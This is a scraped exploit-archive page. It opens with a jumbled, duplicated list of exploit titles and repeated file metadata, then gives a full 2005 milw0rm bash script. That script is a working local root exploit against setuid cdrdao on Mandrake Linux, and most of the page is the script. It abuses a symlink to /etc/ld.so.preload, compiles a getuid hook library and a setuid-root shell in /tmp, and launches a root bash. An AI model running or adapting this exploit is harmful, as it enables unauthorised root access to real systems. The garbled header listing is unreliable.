
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
100 lines
2 KiB
Bash
Executable file
100 lines
2 KiB
Bash
Executable file
#!/bin/sh
|
|
# cdrdao local root exploit
|
|
# newbug [at] chroot.org
|
|
# IRC: irc.chroot.org #chroot
|
|
# May 2005
|
|
echo "cdrdao private exploit"
|
|
echo "This exploit only for Mandrake series"
|
|
echo "newbug [at] chroot.org"
|
|
echo "May 2005"
|
|
|
|
echo "checking if cdrdao is setuid ...";
|
|
if [ ! -u /usr/bin/cdrdao ]; then
|
|
echo "[-] Failed";
|
|
exit
|
|
fi
|
|
echo "[+] done.";
|
|
echo "checking if /etc/ld.so.preload already exist ..."
|
|
if [ -f /etc/ld.so.preload ]; then
|
|
echo "[-] Failed."
|
|
exit
|
|
else
|
|
echo "[+] done."
|
|
fi
|
|
|
|
echo "checking if ~/.cdrdao already exist ..."
|
|
if [ -f ~/.cdrdao ]; then
|
|
rm -rf ~/.cdrdao
|
|
fi
|
|
echo "[+] done."
|
|
|
|
cd /tmp
|
|
|
|
echo "preparing hook library ..."
|
|
cat >ld.so.c<<EOF
|
|
#include <stdlib.h>
|
|
uid_t getuid()
|
|
{
|
|
return 0;
|
|
}
|
|
EOF
|
|
echo "[+] done."
|
|
echo "preparing shell program ..."
|
|
cat >sh.c <<EOF
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
|
|
int main(int argc,char **argv)
|
|
{
|
|
setreuid(0,0);
|
|
setgid(0);
|
|
|
|
unlink("/tmp/ld.so");
|
|
if(getuid())
|
|
{
|
|
printf("[-] Failed.\n");
|
|
unlink(argv[0]);
|
|
exit(0);
|
|
}
|
|
printf("[+] Congratulation, You win the game !!\n");
|
|
unlink("/etc/ld.so.preload");
|
|
|
|
execl("/bin/bash","bash",(char *)0);
|
|
|
|
return 0;
|
|
}
|
|
EOF
|
|
echo "[+] done."
|
|
|
|
echo "link .cdrdao ==> /etc/ld.so.preload ..."
|
|
ln -sf /etc/ld.so.preload ~/.cdrdao
|
|
echo "[+] done."
|
|
|
|
echo "compile hook library ..."
|
|
gcc -shared -o ld.so ld.so.c
|
|
echo "[+] done."
|
|
echo "compile shell program ..."
|
|
gcc -o sh sh.c
|
|
echo "[+] done."
|
|
|
|
umask 0
|
|
|
|
echo "run cdrdao ..."
|
|
cdrdao unlock --save >/dev/null 2>&1
|
|
echo "[+] done."
|
|
|
|
echo "checking if /etc/ld.so.preload created successful..."
|
|
if [ -f /etc/ld.so.preload ]; then
|
|
echo "[+] done."
|
|
else
|
|
echo "[-] Failed."
|
|
exit
|
|
fi
|
|
echo "/tmp/ld.so">/etc/ld.so.preload
|
|
rm -f /tmp/sh.c
|
|
rm -f /tmp/ld.so.c
|
|
su -c "chown root.root /tmp/sh;chmod 4755 /tmp/sh" >/dev/null 2>&1
|
|
echo "!@#\$@%#$%#$%!@%^"
|
|
/tmp/sh
|
|
|
|
# milw0rm.com [2005-05-17]
|